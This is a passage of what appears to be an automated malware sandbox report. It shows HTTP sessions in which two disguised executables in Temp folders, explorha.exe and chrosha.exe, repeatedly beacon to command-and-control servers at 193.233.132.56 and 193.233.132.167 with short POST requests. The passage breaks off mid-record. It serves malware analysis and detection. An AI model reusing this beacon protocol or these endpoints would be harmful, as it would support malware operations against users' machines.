                                                                                                                                                                                                                                      986 | 192.168.2.5 | 50838 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:30.426843882 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:30.682074070 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      987 | 192.168.2.5 | 50839 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:30.525902033 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:30.774481058 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      988 | 192.168.2.5 | 50840 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:31.024622917 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:31.274348974 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      989 | 192.168.2.5 | 50841 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:31.043504953 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:31.295036077 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      990 | 192.168.2.5 | 50842 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:31.547379971 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:31.799392939 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      991 | 192.168.2.5 | 50843 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:31.635654926 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:31.885045052 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      992 | 192.168.2.5 | 50844 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:32.146002054 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:32.403027058 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      993 | 192.168.2.5 | 50846 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:32.176044941 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:32.424511909 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      994 | 192.168.2.5 | 50847 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:32.750264883 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:32.989425898 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      995 | 192.168.2.5 | 50849 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:32.803952932 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:33.051019907 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      996 | 192.168.2.5 | 50850 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:33.235330105 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:33.482317924 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      997 | 192.168.2.5 | 50851 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:33.415332079 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:33.662297964 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      998 | 192.168.2.5 | 50852 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:33.834254980 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:34.079785109 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      999 | 192.168.2.5 | 50853 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:33.913750887 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:34.164621115 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      1000 | 192.168.2.5 | 50854 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:34.330091000 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:34.578963041 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      1001 | 192.168.2.5 | 50855 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
